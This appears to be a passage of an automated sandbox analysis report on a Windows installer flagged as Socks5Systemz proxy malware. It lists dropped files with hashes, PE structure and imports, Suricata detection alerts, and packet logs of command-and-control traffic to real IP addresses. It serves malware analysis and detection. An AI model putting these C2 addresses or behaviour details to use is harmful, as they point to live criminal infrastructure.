SHA-256:	90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
SHA-512:	6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
Malicious:	false
Preview:	3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................

C:\ProgramData\ts.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:8ml/:pl/
MD5:	CFC9B8231876E8F68F615F22F94F725A
SHA1:	5128193DFBC136568DFC71E319B6C2757CEF1739
SHA-256:	B643FF979737794088830076F5B3CE794B819DB2A8E0E8F4363641E3596DF1AC
SHA-512:	A37F83A9CCC489011351EB16124431F5C770281DE1EBFB72BFCEE1E4039FCB00B738C7076CD5BFB68E454F98F2B381546E954528F833E1639BB15DF436D225A1
Malicious:	false
Preview:	a.^g....

C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Download File

Process:	C:\Users\user\Desktop\Mg5bMQ2lWi.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704000
Entropy (8bit):	6.4972640482038075
Encrypted:	false
SSDEEP:	12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
MD5:	F448D7F4B76E5C9C3A4EAFF16A8B9B73
SHA1:	31808F1FFA84C954376975B7CDB0007E6B762488
SHA-256:	7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
SHA-512:	F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.8975201046735535
Encrypted:	false
SSDEEP:	384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
MD5:	3ADAA386B671C2DF3BAE5B39DC093008
SHA1:	067CF95FBDB922D81DB58432C46930F86D23DDED
SHA-256:	71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
SHA-512:	BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.999426147061674
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Mg5bMQ2lWi.exe
File size:	7'240'000 bytes
MD5:	7700eba1ceaa134b1da16d1ede0e7894
SHA1:	d591222916193a3bcaef009eae37fc60acbff924
SHA256:	87324fceb64682470429276f1766671ad250163a2404b7b7df6f4d25007a1df0
SHA512:	571691b0c5af9d912814de97e0db6523a2d7ea73e0ad6ff128f0e16d1d3d724df370bb856f1f59cf09145963c0fe7f2d1ee6dc3453e3ce39a567a14724c3c9e0
SSDEEP:	98304:w+koiRLFdsODKUdFxQ8k618KzAYYC9z3Bbgtev25o40nsZJjNw5MQNiEU4P5EKHl:xz25G6bV1yYDuZxCWQNhUU2uNzj
TLSH:	997633109166CC3FC4B3DDF1ACAB700611DD7C652D368BED982DDA4E17ABC72191C5A8
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x409c40
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65765E41 [Mon Dec 11 00:56:33 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	884310b1928934402ea6fec1dbd3cf5e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F5AE8DC266Bh
call 00007F5AE8DC3872h
call 00007F5AE8DC3B01h
call 00007F5AE8DC5B38h
call 00007F5AE8DC5B7Fh
call 00007F5AE8DC84AEh
call 00007F5AE8DC8615h
xor eax, eax
push ebp
push 0040A2FCh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A2C5h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F5AE8DC907Bh
call 00007F5AE8DC8CAEh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F5AE8DC6168h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007F5AE8DC2717h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 0040738Ch
call 00007F5AE8DC69F7h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A27Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F5AE8DC90EBh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F5AE8DC922Ah
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007F5AE8DC6DF8h
mov edx, dword ptr [000000F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd000	0x950	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x2c00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x9364	0x9400	0d7ac17dafcd52a9b3ea353c32256c1d	False	0.6148648648648649	data	6.56223225792919	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xb000	0x24c	0x400	45829356498700390b8c7afa10ea05a4	False	0.31640625	data	2.7585022150416294	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xc000	0xe4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd000	0x950	0xa00	bb5485bf968b970e5ea81292af2acdba	False	0.414453125	data	4.430733069799036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xe000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf000	0x18	0x200	9ba824905bf9c7922b6fc87a38b74366	False	0.052734375	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x10000	0x8b4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x2c00	0x2c00	f6c630e7cc236d28ebf716909ed9b50a	False	0.32262073863636365	data	4.461907293084106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x11354	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Dutch	Netherlands	0.5675675675675675
RT_ICON	0x1147c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	Dutch	Netherlands	0.4486994219653179
RT_ICON	0x119e4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Dutch	Netherlands	0.4637096774193548
RT_ICON	0x11ccc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	Dutch	Netherlands	0.3935018050541516
RT_STRING	0x12574	0x2f2	data			0.35543766578249336
RT_STRING	0x12868	0x30c	data			0.3871794871794872
RT_STRING	0x12b74	0x2ce	data			0.42618384401114207
RT_STRING	0x12e44	0x68	data			0.75
RT_STRING	0x12eac	0xb4	data			0.6277777777777778
RT_STRING	0x12f60	0xae	data			0.5344827586206896
RT_RCDATA	0x13010	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x1303c	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0x1307c	0x4b8	COM executable for DOS	English	United States	0.27483443708609273
RT_MANIFEST	0x13534	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
Dutch	Netherlands
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T00:53:05.470412+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49736	94.232.249.187	80	TCP
2024-12-15T00:53:05.470412+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49736	94.232.249.187	80	TCP
2024-12-15T00:53:18.604536+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49764	94.232.249.187	80	TCP
2024-12-15T00:53:18.604536+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49764	94.232.249.187	80	TCP
2024-12-15T00:53:31.870192+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49790	94.232.249.187	80	TCP
2024-12-15T00:53:31.870192+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49790	94.232.249.187	80	TCP
2024-12-15T00:53:50.705539+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:50.705539+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:54.522921+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:54.522921+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:56.045459+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49860	185.237.206.129	80	TCP
2024-12-15T00:53:56.045459+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49860	185.237.206.129	80	TCP
2024-12-15T00:53:57.696443+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49866	185.237.206.129	80	TCP
2024-12-15T00:53:57.696443+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49866	185.237.206.129	80	TCP
2024-12-15T00:53:59.329963+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49872	185.237.206.129	80	TCP
2024-12-15T00:53:59.329963+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49872	185.237.206.129	80	TCP
2024-12-15T00:54:00.858930+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49875	185.237.206.129	80	TCP
2024-12-15T00:54:00.858930+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49875	185.237.206.129	80	TCP
2024-12-15T00:54:02.418389+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49880	185.237.206.129	80	TCP
2024-12-15T00:54:02.418389+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49880	185.237.206.129	80	TCP
2024-12-15T00:54:04.014737+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49885	185.237.206.129	80	TCP
2024-12-15T00:54:04.014737+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49885	185.237.206.129	80	TCP
2024-12-15T00:54:05.707108+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49889	185.237.206.129	80	TCP
2024-12-15T00:54:05.707108+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49889	185.237.206.129	80	TCP
2024-12-15T00:54:07.245777+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	49894	185.237.206.129	80	TCP
2024-12-15T00:54:07.245777+0100	2049468	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	49894	185.237.206.129	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:52:57.321162939 CET	49736	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:52:57.441134930 CET	80	49736	94.232.249.187	192.168.2.4
Dec 15, 2024 00:52:57.441384077 CET	49736	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:52:57.448066950 CET	49736	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:52:57.567864895 CET	80	49736	94.232.249.187	192.168.2.4
Dec 15, 2024 00:53:05.470412016 CET	49736	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:10.479865074 CET	49764	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:10.601378918 CET	80	49764	94.232.249.187	192.168.2.4
Dec 15, 2024 00:53:10.601466894 CET	49764	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:10.601617098 CET	49764	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:10.723824978 CET	80	49764	94.232.249.187	192.168.2.4
Dec 15, 2024 00:53:18.604536057 CET	49764	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:23.647463083 CET	49790	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:23.768018961 CET	80	49790	94.232.249.187	192.168.2.4
Dec 15, 2024 00:53:23.768807888 CET	49790	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:23.860173941 CET	49790	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:23.980261087 CET	80	49790	94.232.249.187	192.168.2.4
Dec 15, 2024 00:53:31.870192051 CET	49790	80	192.168.2.4	94.232.249.187
Dec 15, 2024 00:53:49.205490112 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:49.325556040 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:49.325758934 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:49.326066017 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:49.446201086 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:50.705348015 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:50.705538988 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:50.707357883 CET	49851	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:50.827215910 CET	2023	49851	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:50.827402115 CET	49851	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:50.827402115 CET	49851	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:50.949246883 CET	2023	49851	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:50.949470997 CET	49851	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:51.069905996 CET	2023	49851	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:52.073286057 CET	2023	49851	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:52.119965076 CET	49851	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:54.089119911 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.208997011 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:54.522368908 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:54.522921085 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.636126995 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.636346102 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.756181955 CET	80	49860	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:54.756376028 CET	80	49847	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:54.756534100 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.756535053 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.756561995 CET	49847	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:54.876568079 CET	80	49860	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:56.045377970 CET	80	49860	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:56.045459032 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.045840979 CET	49865	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:56.165807009 CET	2023	49865	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:56.165951967 CET	49865	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:56.166026115 CET	49865	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:56.166026115 CET	49865	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:56.276501894 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.276828051 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.285968065 CET	2023	49865	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:56.328742981 CET	2023	49865	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:56.396863937 CET	80	49860	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:56.396964073 CET	80	49866	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:56.397070885 CET	49860	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.397176027 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.397176027 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:56.517019033 CET	80	49866	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:57.194428921 CET	2023	49865	89.105.201.183	192.168.2.4
Dec 15, 2024 00:53:57.196671963 CET	49865	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:53:57.696259022 CET	80	49866	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:57.696443081 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:57.807899952 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:57.808021069 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:57.927970886 CET	80	49872	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:57.928073883 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:57.928143978 CET	80	49866	185.237.206.129	192.168.2.4
